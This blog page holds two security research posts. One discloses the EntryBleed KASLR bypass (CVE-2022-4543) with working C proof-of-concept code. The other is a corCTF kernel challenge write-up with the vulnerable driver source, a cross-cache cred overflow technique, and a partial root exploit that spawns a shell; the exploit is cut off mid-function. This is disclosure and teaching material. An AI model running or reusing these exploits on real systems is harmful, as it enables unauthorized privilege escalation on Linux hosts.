Friday, December 16, 2022

EntryBleed: Breaking KASLR under KPTI with Prefetch (CVE-2022-4543)

Recently, I discovered that the Linux implementation of KPTI has issues that allow any unprivileged local attacker to bypass KASLR on Intel-based systems. While technically only an info-leak, it still provides a primitive with serious implications for bugs previously considered too hard to exploit, and was assigned CVE-2022-4543. For reasons that will become clear later in this writeup, I have decided to name this attack “EntryBleed.”

KPTI (originally named KAISER) stands for Kernel Page Table Isolation. It was introduced a few years ago as a patch for the Meltdown micro-architectural vulnerability, in which unprivileged attackers could abuse a side channel to leak kernel memory. According to the documentation, KPTI splits the user and kernel page tables for each process. The kernel still has all of userspace virtual memory mapped in, but with the NX bit set; userspace, on the other hand, only has the minimal amount of kernel virtual memory mapped in, like the exception/syscall entry handlers and anything else necessary for the user-to-kernel transition. KAISER actually stood for “Kernel Address Isolation to have Side-channels Efficiently Removed” and predates Meltdown, as other side-channel KASLR bypasses were already known to be an issue. If part of KPTI’s purpose is to act as a barrier against KASLR bypasses from CPU side-channel attacks, then clearly it has failed as of this post.

In 2016, Daniel Gruss discovered the concept of the prefetch side channel. I used one variant of it, which specifically utilizes the TLB (the caching mechanism for virtual-to-physical address translations) as the side-channel mechanism. x86_64 has a group of prefetch instructions, which “prefetch” addresses into the CPU cache. A prefetch finishes quickly if the address being loaded is already present in the TLB, but more slowly when it is not (and a page table walk needs to be done). At the time, it was already known that ASLR (and KASLR) could be bypassed by timing prefetches across a range of candidate addresses using high-resolution timing instructions like RDTSC.

Before I continue with the attack, I should note that my main inspiration came from Google Project Zero’s recent blogpost on exploiting CVE-2022-42703. In the final section of that blogpost, they discuss how KPTI has been left off as more modern CPUs have Meltdown mitigations in silicon, but this makes them vulnerable to prefetch again. In this case, one would just assume: “Ok, let me enable KPTI again then.” To quote the post: “kPTI was helpful in mitigating this side channel,” which would make perfect sense given the purpose of KPTI/KAISER, and seemed to be the consensus when I talked to a few other security researcher friends.

For whatever reason, I had a gut feeling that something was wrong. I thought that maybe the minimal subset of kernel code that stays mapped while userspace runs could be located with prefetch techniques. After an hour of digging, I noticed the following: in syscall_init, the address of entry_SYSCALL_64 (which sits at a constant offset from KASLR base, per /proc/kallsyms) is stored in the LSTAR MSR, which holds the address of the kernel’s handler for 64-bit syscalls. Notice how the handler executes a few instructions before switching to the kernel CR3 (if KPTI is on) - this means the function has to still be mapped in the userspace page tables. I then performed a manual page table walk in a debugger using the user CR3, and it turns out that entry_SYSCALL_64 is mapped at the same KASLR-rebased virtual address in userspace as it is in the kernel - this sounds very suspicious!

At this point, I was quite confident that a prefetch side-channel could reveal the location of entry_SYSCALL_64, and since it seemed to be slid with the rest of the kernel, the KASLR base as well. The overall idea is just to repeatedly execute syscalls to ensure that the page with entry_SYSCALL_64 (hence the name EntryBleed) gets cached in the instruction TLB, and then prefetch side-channel the possible range of addresses for that handler (as the kernel itself is guaranteed to be within 0xffffffff80000000 - 0xffffffffc0000000). 

An astute reader might wonder how the entry is preserved upon returning to userland despite the CR3 write when switching to kernel page tables. This is most likely due to the global bit being set on this page's page table entry, which would protect it from TLB invalidation on mov instructions to CR3. In fact, PTI documentation says the following: "global pages are disabled for all kernel structures not mapped into both kernel and userspace page tables." I originally suspected that PCID (which introduces separate TLB contexts to lower the occurrence of invalidation using the lower 12 bits of CR3) was the root cause as it often appears in discussions about performance optimization of Meltdown mitigations, but the KPTI CR3 bitmask shows no modifications to PCID. Perhaps I'm misunderstanding the code, so it would be great if someone can correct me if I'm wrong here.

Anyways, the resulting bypass is extremely simple. Unlike some other uarch attacks, it works fine under normal load on normal systems, and I can deduce KASLR base on systems with KPTI with almost complete accuracy by just averaging 100 iterations. Note that the measurement code itself is from the original prefetch paper, with cpuid swapped for a fence instruction so it works in VMs (credit goes to P0 for that technique). Below is my code (entry_SYSCALL_64_offset has to be adjusted per kernel, by setting it to the distance between entry_SYSCALL_64 and startup_64):

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>

#define KERNEL_LOWER_BOUND 0xffffffff80000000ull
#define KERNEL_UPPER_BOUND 0xffffffffc0000000ull
#define entry_SYSCALL_64_offset 0x400000ull

uint64_t sidechannel(uint64_t addr)
{
    uint64_t a, b, c, d;
    asm volatile (".intel_syntax noprefix;"
        "mfence;"
        "rdtscp;"
        "mov %0, rax;"
        "mov %1, rdx;"
        "xor rax, rax;"
        "lfence;"
        "prefetchnta qword ptr [%4];"
        "prefetcht2 qword ptr [%4];"
        "xor rax, rax;"
        "lfence;"
        "rdtscp;"
        "mov %2, rax;"
        "mov %3, rdx;"
        "mfence;"
        ".att_syntax;"
        : "=r" (a), "=r" (b), "=r" (c), "=r" (d)
        : "r" (addr)
        : "rax", "rbx", "rcx", "rdx");
    a = (b << 32) | a;
    c = (d << 32) | c;
    return c - a;
}

#define STEP 0x100000ull
#define SCAN_START KERNEL_LOWER_BOUND + entry_SYSCALL_64_offset
#define SCAN_END KERNEL_UPPER_BOUND + entry_SYSCALL_64_offset
#define DUMMY_ITERATIONS 5
#define ITERATIONS 100
#define ARR_SIZE (SCAN_END - SCAN_START) / STEP

uint64_t leak_syscall_entry(void)
{
    uint64_t data[ARR_SIZE] = {0};
    uint64_t min = ~0, addr = ~0;

    for (int i = 0; i < ITERATIONS + DUMMY_ITERATIONS; i++)
    {
        for (uint64_t idx = 0; idx < ARR_SIZE; idx++)
        {
            uint64_t test = SCAN_START + idx * STEP;
            syscall(104);
            uint64_t time = sidechannel(test);
            if (i >= DUMMY_ITERATIONS)
                data[idx] += time;
        }
    }

    for (int i = 0; i < ARR_SIZE; i++)
    {
        data[i] /= ITERATIONS;
        if (data[i] < min)
        {
            min = data[i];
            addr = SCAN_START + i * STEP;
        }
        printf("%llx %ld\n", (SCAN_START + i * STEP), data[i]);
    }

    return addr;
}

int main()
{
    printf("KASLR base %llx\n", leak_syscall_entry() - entry_SYSCALL_64_offset);
}

KASLR bypassed on systems with KPTI in less than 100 lines of C!

I’ve gotten this to work on multiple Intel CPUs (including an i5-8265U, i7-8750H, i7-9700F, i7-9750H, and Xeon E5-2640) - it also worked on some VPS instances, though I was unable to determine the Intel CPU model there. It works across a wide range of kernel versions with KPTI - I’ve tested it on Arch 6.0.12-hardened1-1-hardened, Ubuntu 5.15.0-56-generic, 6.0.12-1-MANJARO, 5.10.0-19-amd64, and a custom 5.18.3 build. It also works in KVM guests to leak the guest OS KASLR base (though one would need to forward the host CPU features with "-cpu host" in QEMU for prefetch to even work). I'm not sure how the TLB entries survive the CR3 writes and potential VM exits in the VM scenario - if anyone has ideas, please let me know! As of now, I don’t think this attack affects AMD, but I also don't have direct access to any AMD hardware (see the edit at the end). Lastly, I don't believe the repeated syscalls are necessary in my exploit - later tests showed it worked without making them before each measurement, most likely due to the global bit - but I kept them in just to guarantee the entry's presence in the TLB.

Here is a demonstration of it (kernel base is printed before the shell for comparison purposes): 

One way to increase reliability would be to access many userspace addresses at specific strides beforehand to evict the TLB (and avoid false answers from other cached kernel addresses, which I saw with higher frequency on some systems). I also hypothesize that in scenarios without KPTI (like in Project Zero’s case), prefetch would work even better if one were to trigger a specific codepath in the kernel and specifically hunt for that offset during the side channel.

In conclusion, Linux KPTI doesn’t do its job, and it’s still quite easy to get KASLR base. I’ve already emailed the kernel security team as well as the relevant distro mailing lists, and was authorized to disclose this as a potential fix might take a while. I’m honestly not sure what the best approach to fixing this is, as it’s more of an implementation issue, but I suggested randomizing the virtual address of the entry/exit handlers that are mapped into userspace - either placing them at a fixed virtual address unrelated to kernel base, or giving them their own randomized offset from kernel base. I suspect that this problem might really just be due to a major oversight; one kernel developer mentioned to me that this was definitely not the intent and might have been a regression.

I’ll end this post with some acknowledgements. A huge shoutout goes to my uarch security mentor Joseph Ravichandran from MIT CSAIL for guiding me through this field of research and advising me extensively on this bug. He introduced me to prefetch attacks through the Secure Hardware Design course taught by Professor Mengjia Yan - one of its final labs is actually about bypassing userland ASLR using prefetch. Thanks must also go to Seth Jenkins at Project Zero for the original inspiration, and to D3v17 for his support and extensive testing. As always, feel free to ask questions or point out any mistakes in my explanations!

Edit (12/18/2022): As bcoles later informed me, a generic prefetch attack seems to work on some AMD CPUs, which isn't surprising given this paper and this security advisory. However, it's important to note that this is essentially the same attack Project Zero originally discussed, as AMD was not affected by Meltdown, so KPTI was never enabled for its processors.

Tuesday, August 16, 2022

Reviving Exploits Against Cred Structs - Six Byte Cross Cache Overflow to Leakless Data-Oriented Kernel Pwnage

Last year in corCTF 2021, D3v17 and I wrote two kernel challenges demonstrating the power of msg_msg: Fire of Salvation and Wall of Perdition. msg_msg turned out to be a really powerful exploitation primitive and has since been repeatedly utilized in real world exploits.

For this year’s edition, we followed a similar trend and designed challenges requiring techniques previously seen in real world exploits (but not in CTFs). I wrote Cache of Castaways, which requires a cross cache attack against cred structs in their isolated slabs. The attack utilizes a simple, leakless, data-only approach applicable on systems with low noise. D3v17 wrote CoRJail, which requires a Docker escape and a novel approach of abusing poll_list objects through their slow path setup to build an arbitrary free primitive.

For my challenge, a standard CTF kernel setup was given along with the kernel compilation config. SMAP, SMEP, KPTI, KASLR, and many other standard kernel mitigations were on - I even disabled msg_msg for difficulty’s sake. The kernel version used was 5.18.3, booted with 1 CPU and 4 GBs of RAM. You can download the challenge with the included driver in the corCTF 2022 archive repo.

Here is the source of the CTF driver (I did not provide source during the competition as reversing this is quite simple): 

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/device.h>
#include <linux/mutex.h>
#include <linux/fs.h>
#include <linux/slab.h>
#include <linux/miscdevice.h>
#include <linux/uaccess.h>
#include <linux/types.h>
#include <linux/random.h>
#include <linux/delay.h>
#include <linux/list.h>
#include <linux/vmalloc.h>

#define DEVICE_NAME "castaway"
#define CLASS_NAME "castaway"

#define OVERFLOW_SZ 0x6
#define CHUNK_SIZE 512
#define MAX 8 * 50

#define ALLOC 0xcafebabe
#define DELETE 0xdeadbabe
#define EDIT 0xf00dbabe

MODULE_DESCRIPTION("a castaway cache, a secluded slab, a marooned memory");
MODULE_LICENSE("GPL");
MODULE_AUTHOR("FizzBuzz101");

typedef struct
{
    int64_t idx;
    uint64_t size;
    char *buf;
}user_req_t;

int castaway_ctr = 0;

typedef struct
{
    char pad[OVERFLOW_SZ];
    char buf[];
}castaway_t;

struct castaway_cache
{
    char buf[CHUNK_SIZE];
};

static DEFINE_MUTEX(castaway_lock);

castaway_t **castaway_arr;

static long castaway_ioctl(struct file *file, unsigned int cmd, unsigned long arg);
static long castaway_add(void);
static long castaway_edit(int64_t idx, uint64_t size, char *buf);

static struct miscdevice castaway_dev;
static struct file_operations castaway_fops = {.unlocked_ioctl = castaway_ioctl};

static struct kmem_cache *castaway_cachep;

static long castaway_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
    user_req_t req;
    long ret = 0;

    if (cmd != ALLOC && copy_from_user(&req, (void *)arg, sizeof(req)))
    {
        return -1;
    }
    mutex_lock(&castaway_lock);
    switch (cmd)
    {
        case ALLOC:
            ret = castaway_add();
            break;
        case EDIT:
            ret = castaway_edit(req.idx, req.size, req.buf);
            break;
        default:
            ret = -1;
    }
    mutex_unlock(&castaway_lock);
    return ret;
}

static long castaway_add(void)
{
    int idx;

    if (castaway_ctr >= MAX)
    {
        goto failure_add;
    }
    idx = castaway_ctr++;
    castaway_arr[idx] = kmem_cache_zalloc(castaway_cachep, GFP_KERNEL_ACCOUNT);
    if (!castaway_arr[idx])
    {
        goto failure_add;
    }
    return idx;

failure_add:
    printk(KERN_INFO "castaway chunk allocation failed\n");
    return -1;
}

static long castaway_edit(int64_t idx, uint64_t size, char *buf)
{
    char temp[CHUNK_SIZE];

    if (idx < 0 || idx >= MAX || !castaway_arr[idx])
    {
        goto edit_fail;
    }
    if (size > CHUNK_SIZE || copy_from_user(temp, buf, size))
    {
        goto edit_fail;
    }
    memcpy(castaway_arr[idx]->buf, temp, size);
    return size;

edit_fail:
    printk(KERN_INFO "castaway chunk editing failed\n");
    return -1;
}

static int init_castaway_driver(void)
{
    castaway_dev.minor = MISC_DYNAMIC_MINOR;
    castaway_dev.name = DEVICE_NAME;
    castaway_dev.fops = &castaway_fops;
    castaway_dev.mode = 0644;
    mutex_init(&castaway_lock);
    if (misc_register(&castaway_dev))
    {
        return -1;
    }
    castaway_arr = kzalloc(MAX * sizeof(castaway_t *), GFP_KERNEL);
    if (!castaway_arr)
    {
        return -1;
    }
    castaway_cachep = KMEM_CACHE(castaway_cache, SLAB_PANIC | SLAB_ACCOUNT);
    if (!castaway_cachep)
    {
        return -1;
    }
    printk(KERN_INFO "All alone in an castaway cache... \n");
    printk(KERN_INFO "There's no way a pwner can escape!\n");
    return 0;
}

static void cleanup_castaway_driver(void)
{
    int i;

    misc_deregister(&castaway_dev);
    mutex_destroy(&castaway_lock);
    for (i = 0; i < MAX; i++)
    {
        if (castaway_arr[i])
        {
            kfree(castaway_arr[i]);
        }
    }
    kfree(castaway_arr);
    printk(KERN_INFO "Guess you remain a castaway\n");
}

module_init(init_castaway_driver);
module_exit(cleanup_castaway_driver);

There are only two ioctl commands: one for adding a chunk (all objects in the driver are 512 bytes), and one for editing a chunk, which has a clear 6 byte overflow. Only 400 allocations are allowed in total. As with last year, none of the bugs in our kernel challenges are difficult to find - we wanted to focus on exploitation difficulty.

Under normal circumstances, a 6 byte overflow in a kernel object should be quite exploitable. However, the given object is allocated in an isolated slab cache created with the flags SLAB_PANIC | SLAB_ACCOUNT. Combined with the fact that I compiled with CONFIG_MEMCG_KMEM support, allocations from this cache land in their own separate slabs, away from other generic kmalloc-512 allocations, as duasynt documents. Otherwise, the kernel could alias this cache with others sharing similar properties based on the find_mergeable function (though this would still not have been a problem in this challenge, because I disabled CONFIG_SLAB_MERGE_DEFAULT).

Not only are there freelist randomization and hardening, but the Linux kernel has also moved freelist pointers to the middle of free chunks. The driver’s object also contains neither data pointers nor function pointers. How can one exploit this six byte overflow?

The answer is cross cache overflows. I found resources on this strategy quite scarce, and I haven’t personally seen a CTF challenge that requires it. The technique is increasingly common in real world exploits, as evidenced by CVE-2022-27666 or StarLabs' kCTF msg_msg exploit for CVE-2022-0185. Other articles that inspired this idea were grsecurity’s post on AUTOSLAB and this post on kmalloc internals. Funnily enough, yet another CVE writeup discussing cross cache attacks appeared the day before our CTF began: CVE-2022-29582.

Those articles talk about this technique in greater detail, so I advise you to read them beforehand.

To summarize on my end: kmalloc slab allocations are backed by the underlying buddy allocator. When the requested kmalloc cache has no slabs with free chunks left, the allocator requests an order-n page from the buddy allocator - it calls new_slab, leading to allocate_slab, which triggers a page request from the buddy allocator via alloc_pages in alloc_slab_page:

/*
 * Slab allocation and freeing
 */
static inline struct slab *alloc_slab_page(gfp_t flags, int node,
        struct kmem_cache_order_objects oo)
{
    struct folio *folio;
    struct slab *slab;
    unsigned int order = oo_order(oo);

    if (node == NUMA_NO_NODE)
        folio = (struct folio *)alloc_pages(flags, order);
    else
        folio = (struct folio *)__alloc_pages_node(node, flags, order);

    if (!folio)
        return NULL;

    slab = folio_slab(folio);
    __folio_set_slab(folio);
    if (page_is_pfmemalloc(folio_page(folio, 0)))
        slab_set_pfmemalloc(slab);

    return slab;
}

The buddy allocator maintains an array of FIFO queues, one for each page order. An order-n page is just a physically contiguous chunk of 2^n pages. When a free results in a completely empty slab, the slab allocator can return the underlying page(s) back to the buddy allocator.

The order of the underlying slab pages depends on a multitude of factors, including slab chunk size, system specifications, and kernel build - in practice, you can easily determine it by looking at the pagesperslab field in /proc/slabinfo. For this challenge, the slabs holding the isolated 512 byte objects use order-0 pages.

An important insight for cross cache overflows and page allocator level massage is the behavior of buddy allocators when a requested order’s queue is empty. In this case, the buddy allocator attempts to find a page from order n+1 and splits it in half, bringing these buddy pages into order n. If such a higher order buddy page does not exist, it just looks at the next order and so forth. When a page returns to the buddy allocator and its corresponding buddy page is also in the same queue, they are merged and move into the next order’s queue (and the same process can continue from there).

In many previous cross cache overflow exploits, the pattern is to overflow from a slab without known abusable objects onto a slab with abusable objects. It is also possible to abuse the same cross cache principle for UAF bugs. Most known exploits target objects backed by pages of order greater than 0, due to the lower noise and improved stability there. However, this doesn’t make cross cache overflows onto order-0 pages impossible, especially if system noise is low. Order 0 is a nice target because it unlocks even more abusable objects, like the famous 128 byte cred struct. For those unfamiliar with the cred object, it basically determines process privileges within its first few qwords.

One of my earliest memories in kernel exploitation was learning that rooting a system by overflowing into a cred struct is impossible because of its slab isolation in the cred_jar cache. Once I learned about cross cache attacks, I knew I had to write a challenge to see whether attacking cred structs is feasible.

The high level strategy of my exploit is the following: drain the cred_jar so future allocations pull from the order 0 buddy allocator, drain many higher order pages into order 0 sized pages, free some in a manner that avoids buddy page merging, spray more cred objects, free more held pages, and finally spray allocations of the vulnerable object to overflow onto at least one cred object (the vulnerable object page must be allocated right above a cred slab). The nice thing about this approach is its elegance - KASLR leaks, arbitrary read/write, and ROP chains are not needed! It is a simple, leakless, and data-only approach!

To trigger cred object allocations, one just needs to fork. Though a standard fork does cause a lot of noise as other allocations do occur, this does not matter for the initial spray in my exploit.

As the driver only permits a limited number of 512 byte allocations (400 total, so about 50 pages at 8 objects per slab) and has no freeing option, a better page spraying primitive is required. The general trick is to look for functions that reference page allocator functions such as __get_free_pages, alloc_page, or alloc_pages. D3v17 mentioned a really nice one to me, based on the page allocating primitive from CVE-2017-7308 documented in this P0 writeup. If you use setsockopt to set the packet version to TPACKET_V1/TPACKET_V2, and then use the same syscall to initialize a PACKET_TX_RING (which creates a ring buffer, used with PACKET_MMAP, for improved transmission through userspace mapped packet buffers), you hit this code in packet_setsockopt. Note that the P0 writeup used PACKET_RX_RING, but PACKET_TX_RING gives the same results for the purposes of page allocator control.

case PACKET_RX_RING:
case PACKET_TX_RING:
{
    union tpacket_req_u req_u;
    int len;

    lock_sock(sk);
    switch (po->tp_version) {
    case TPACKET_V1:
    case TPACKET_V2:
        len = sizeof(req_u.req);
        break;
    case TPACKET_V3:
    default:
        len = sizeof(req_u.req3);
        break;
    }
    if (optlen < len) {
        ret = -EINVAL;
    } else {
        if (copy_from_sockptr(&req_u.req, optval, len))
            ret = -EFAULT;
        else
            ret = packet_set_ring(sk, &req_u, 0,
                    optname == PACKET_TX_RING);
    }
    release_sock(sk);
    return ret;
}

This case calls packet_set_ring using the provided tpacket_req_u union, which then calls alloc_pg_vec. The arguments are the tpacket_req struct pulled from the union and an order derived from the struct’s tp_block_size. alloc_pg_vec then calls alloc_one_pg_vec_page tp_block_nr times, each of which leads to a __get_free_pages call.

static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
    unsigned int block_nr = req->tp_block_nr;
    struct pgv *pg_vec;
    int i;

    pg_vec = kcalloc(block_nr, sizeof(struct pgv),
             GFP_KERNEL | __GFP_NOWARN);
    if (unlikely(!pg_vec))
        goto out;

    for (i = 0; i < block_nr; i++) {
        pg_vec[i].buffer = alloc_one_pg_vec_page(order);
        if (unlikely(!pg_vec[i].buffer))
            goto out_free_pgvec;
    }

out:
    return pg_vec;

out_free_pgvec:
    free_pg_vec(pg_vec, order, block_nr);
    pg_vec = NULL;
    goto out;
}


What the above primitive gives us is the ability to drain tp_block_nr order-n pages (where n is determined by tp_block_size), and to free those tp_block_nr pages again by closing the socket fd. The only issue is that low privileged users can’t use these socket features in the root namespace, but on many Linux systems we can create our own unprivileged user namespace. There are definitely alternative methods to drain pages (most likely ones that don’t need namespaces). Another approach would be to repeatedly spray object allocations (like msg_msg, which I disabled), though that may be less reliable from a shared slab.

Another important point to address for the exploit is the noise that fork (or clone with equivalent flags) causes. Every time you fork, many allocations occur, from both the slab and buddy allocators.

The core function for process creation is kernel_clone. Keep in mind that a traditional fork has no flags set in kernel_clone_args. The following then happens:

1. kernel_clone calls copy_process

2. copy_process calls dup_task_struct. This allocates a task_struct from its own cache (which relies on order-2 pages on the target system). Then it calls alloc_thread_stack_node, which uses __vmalloc_node_range to allocate a 16kb virtually contiguous region for the kernel thread stack if no cached stacks are available. This usually allocates away four order-0 pages.

3. The above vmalloc call allocates a kmalloc-64 chunk to help set up the vmalloc virtual mappings. Following this, the kernel allocates vmap_area chunks from vmap_area_cachep - on this system and kernel there were two, the first coming from alloc_vmap_area. I am not completely sure where the second vmap_area allocation is triggered from - I suspect it comes from preload_this_cpu_lock, as debugging on this setup supports that hypothesis and shows that it does not hit the subsequent free path.

4. Then copy_process calls copy_creds, which triggers a cred object allocation (our desired target) via prepare_creds. This occurs as long as the CLONE_THREAD flag isn’t set.

int copy_creds(struct task_struct *p, unsigned long clone_flags)
{
    struct cred *new;
    int ret;

#ifdef CONFIG_KEYS_REQUEST_CACHE
    p->cached_requested_key = NULL;
#endif

    if (
#ifdef CONFIG_KEYS
        !p->cred->thread_keyring &&
#endif
        clone_flags & CLONE_THREAD
        ) {
        p->real_cred = get_cred(p->cred);
        get_cred(p->cred);
        alter_cred_subscribers(p->cred, 2);
        kdebug("share_creds(%p{%d,%d})",
               p->cred, atomic_read(&p->cred->usage),
               read_cred_subscribers(p->cred));
        inc_rlimit_ucounts(task_ucounts(p), UCOUNT_RLIMIT_NPROC, 1);
        return 0;
    }

    new = prepare_creds();
    if (!new)
        return -ENOMEM;

5. Starting from this section of copy_process, a series of copy_x functions (where x is some process attribute) begins. Each of them triggers an allocation unless its respective CLONE flag is set. In a normal fork, one would expect a new chunk to be allocated from files_cache, fs_cache, sighand_cache, and signal_cache. The largest source of noise is the setup of the mm_struct, which happens as long as CLONE_VM isn’t set. This in turn triggers a lot of allocation activity in caches like vm_area_struct, anon_vma_chain, and anon_vma. All of these allocations are backed by order-0 pages on this system.

    retval = copy_semundo(clone_flags, p);
    if (retval)
        goto bad_fork_cleanup_security;
    retval = copy_files(clone_flags, p);
    if (retval)
        goto bad_fork_cleanup_semundo;
    retval = copy_fs(clone_flags, p);
    if (retval)
        goto bad_fork_cleanup_files;
    retval = copy_sighand(clone_flags, p);
    if (retval)
        goto bad_fork_cleanup_fs;
    retval = copy_signal(clone_flags, p);
    if (retval)
        goto bad_fork_cleanup_sighand;
    retval = copy_mm(clone_flags, p);
    if (retval)
        goto bad_fork_cleanup_signal;
    retval = copy_namespaces(clone_flags, p);
    if (retval)
        goto bad_fork_cleanup_mm;
    retval = copy_io(clone_flags, p);
    if (retval)
        goto bad_fork_cleanup_namespaces;
    retval = copy_thread(clone_flags, args->stack, args->stack_size, p, args->tls);
    if (retval)
        goto bad_fork_cleanup_io;

6. Lastly, the kernel allocates a pid chunk - its slab requires an order 0 page.

There are definitely more details and steps I missed, but the above should suffice for the context of this writeup. The utilized cache properties might also be different depending on slab mergeability and required page sizes for other systems.

Ignoring page allocations from calls like vmalloc and just looking at slab allocations, a single fork would trigger this pattern in this system: 

task_struct kmalloc-64 vmap_area vmap_area cred_jar files_cache fs_cache sighand_cache signal_cache mm_struct vm_area_struct vm_area_struct vm_area_struct vm_area_struct anon_vma_chain anon_vma anon_vma_chain vm_area_struct anon_vma_chain anon_vma anon_vma_chain vm_area_struct anon_vma_chain anon_vma anon_vma_chain vm_area_struct anon_vma_chain anon_vma anon_vma_chain vm_area_struct anon_vma_chain anon_vma anon_vma_chain vm_area_struct vm_area_struct pid

Based on the earlier source analysis and the clone manpage, I managed to drastically reduce this noise with the following flags: CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND. Now, cloning only produces this series of slab allocations:

task_struct kmalloc-64 vmap_area vmap_area cred_jar signal_cache pid

Note that there will still be the four order-0 page allocations from vmalloc as well. Regardless, this noise level is much more acceptable. The only issue now is that our child processes cannot really write to process memory, since they share the same virtual memory as the parent, so we have to use shellcode that relies only on registers to check for successful privilege escalation.

Knowing all of this, we can formulate an exploit now.

Using the initial setsockopt page spray technique, I requested many order-0 pages and freed every other one. This leaves a lot of order-0 pages that cannot be coalesced back into order-1 pages, since each freed page's buddy is still allocated. I had the initial exploit fork into a separate privileged user namespace in order to utilize these page level spraying primitives.

Then I called clone many times with the above flags to trigger the creation of cred objects, freed the remaining held order-0 pages, and sprayed allocations of the vulnerable object so that at least one page of vulnerable objects would sit directly before a page of cred objects. Note that this isn’t structured in a way that exactly follows the allocation behavior seen in fork - we would also be allocating adjacent to all the other order-0-backed allocations mentioned above (pages for vmalloc, the pid slab, the vmap_area slab, etc.). However, the layout should eventually align a vulnerable slab against a cred slab (and it turned out that it did!). I would assume the overflow also hit other chunks, which could result in horrible crashes, but I rarely experienced this - I am not exactly sure why.

I overflowed all of the vulnerable objects with the following six byte payload: four bytes representing 1, followed by two bytes representing 0. The first four bytes keep the cred's usage field sane for kernel refcount checks, while the next two bytes zero out the lower half of the uid field (Linux uids don’t go above 65535, so this suffices). After this overflow spray, I piped a message to all the forks - each in turn checks its uid and drops a shell if it is root.

Below is my final exploit, which effectively has a 100% success rate.

#define _GNU_SOURCE
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sched.h>
#include <assert.h>
#include <time.h>
#include <sys/socket.h>
#include <stdbool.h>

#define ALLOC 0xcafebabe
#define DELETE 0xdeadbabe
#define EDIT 0xf00dbabe

#define CLONE_FLAGS CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND

typedef struct
{
    int64_t idx;
    uint64_t size;
    char *buf;
} user_req_t;

struct tpacket_req
{
    unsigned int tp_block_size;
    unsigned int tp_block_nr;
    unsigned int tp_frame_size;
    unsigned int tp_frame_nr;
};

enum tpacket_versions
{
    TPACKET_V1,
    TPACKET_V2,
    TPACKET_V3,
};

#define PACKET_VERSION 10
#define PACKET_TX_RING 13

#define FORK_SPRAY 320
#define CHUNK_SIZE 512
#define ISO_SLAB_LIMIT 8
#define CRED_JAR_INITIAL_SPRAY 100
#define INITIAL_PAGE_SPRAY 1000
#define FINAL_PAGE_SPRAY 30

typedef struct
{
    bool in_use;
    int idx[ISO_SLAB_LIMIT];
} full_page;

enum spray_cmd
{
    ALLOC_PAGE,
    FREE_PAGE,
    EXIT_SPRAY,
};

typedef struct
{
    enum spray_cmd cmd;
    int32_t idx;
} ipc_req_t;

full_page isolation_pages[FINAL_PAGE_SPRAY] = {0};
int rootfd[2];
int sprayfd_child[2];
int sprayfd_parent[2];
int socketfds[INITIAL_PAGE_SPRAY];

int64_t ioctl(int fd, unsigned long request, unsigned long param)
{
    long result = syscall(16, fd, request, param);
    if (result < 0)
        perror("ioctl on driver");
    return result;
}

int64_t alloc(int fd)
{
    return ioctl(fd, ALLOC, 0);
}

int64_t delete(int fd, int64_t idx)
{
    user_req_t req = {0};
    req.idx = idx;
    return ioctl(fd, DELETE, (unsigned long)&req);
}

int64_t edit(int fd, int64_t idx, uint64_t size, char *buf)
{
    user_req_t req = {.idx = idx, .size = size, .buf = buf};
    return ioctl(fd, EDIT, (unsigned long)&req);
}

void debug()
{
    puts("pause");
    getchar();
    return;
}

void unshare_setup(uid_t uid, gid_t gid)
{
    int temp;
    char edit[0x100];

    unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET);

    temp = open("/proc/self/setgroups", O_WRONLY);
    write(temp, "deny", strlen("deny"));
    close(temp);

    temp = open("/proc/self/uid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", uid);
    write(temp, edit, strlen(edit));
    close(temp);

    temp = open("/proc/self/gid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", gid);
    write(temp, edit, strlen(edit));
    close(temp);

    return;
}

__attribute__((naked)) pid_t __clone(uint64_t flags, void *dest)
{
    asm("mov r15, rsi;"
        "xor rsi, rsi;"
        "xor rdx, rdx;"
        "xor r10, r10;"
        "xor r9, r9;"
        "mov rax, 56;"
        "syscall;"
        "cmp rax, 0;"
        "jl bad_end;"
        "jg good_end;"
        "jmp r15;"
        "bad_end:"
        "neg rax;"
        "ret;"
        "good_end:"
        "ret;");
}

struct timespec timer = {.tv_sec = 1000000000, .tv_nsec = 0};
char throwaway;
char root[] = "root\n";
char binsh[] = "/bin/sh\x00";
char *args[] = {"/bin/sh", NULL};

__attribute__((naked)) void check_and_wait()
{
    asm(
        "lea rax, [rootfd];"
        "mov edi, dword ptr [rax];"
        "lea rsi, [throwaway];"
        "mov rdx, 1;"
        "xor rax, rax;"
        "syscall;"
        "mov rax, 102;"
        "syscall;"
        "cmp rax, 0;"
        "jne finish;"
        "mov rdi, 1;"
        "lea rsi, [root];"
        "mov rdx, 5;"
        "mov rax, 1;"
        "syscall;"
        "lea rdi, [binsh];"
        "lea rsi, [args];"
        "xor rdx, rdx;"
        "mov rax, 59;"
        "syscall;"
        "finish:"
        "lea rdi, [timer];"
        "xor rsi, rsi;"
        "mov rax, 35;"
        "syscall;"
        "ret;");
}

int just_wait()
{
    sleep(1000000000);
}

int alloc_pages_via_sock(uint32_t size, uint32_t n)
{
    struct tpacket_req req;
    int32_t socketfd, version;

    socketfd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (socketfd < 0)
    {
        perror("bad socket");
        exit(-1);
    }

    version = TPACKET_V1;
    if (setsockopt(socketfd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version)) < 0)
    {
        perror("setsockopt PACKET_VERSION failed");
        exit(-1);
    }

    assert(size % 4096 == 0);
    memset(&req, 0, sizeof(req));
    req.tp_block_size = size;
    req.tp_block_nr = n;
    req.tp_frame_size = 4096;
    req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

    if (setsockopt(socketfd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req)) < 0)
    {
        perror("setsockopt PACKET_TX_RING failed");
        exit(-1);
    }

    return socketfd;
}

void spray_comm_handler()
{
    ipc_req_t req;
    int32_t result;

    do
    {
        read(sprayfd_child[0], &req, sizeof(req));
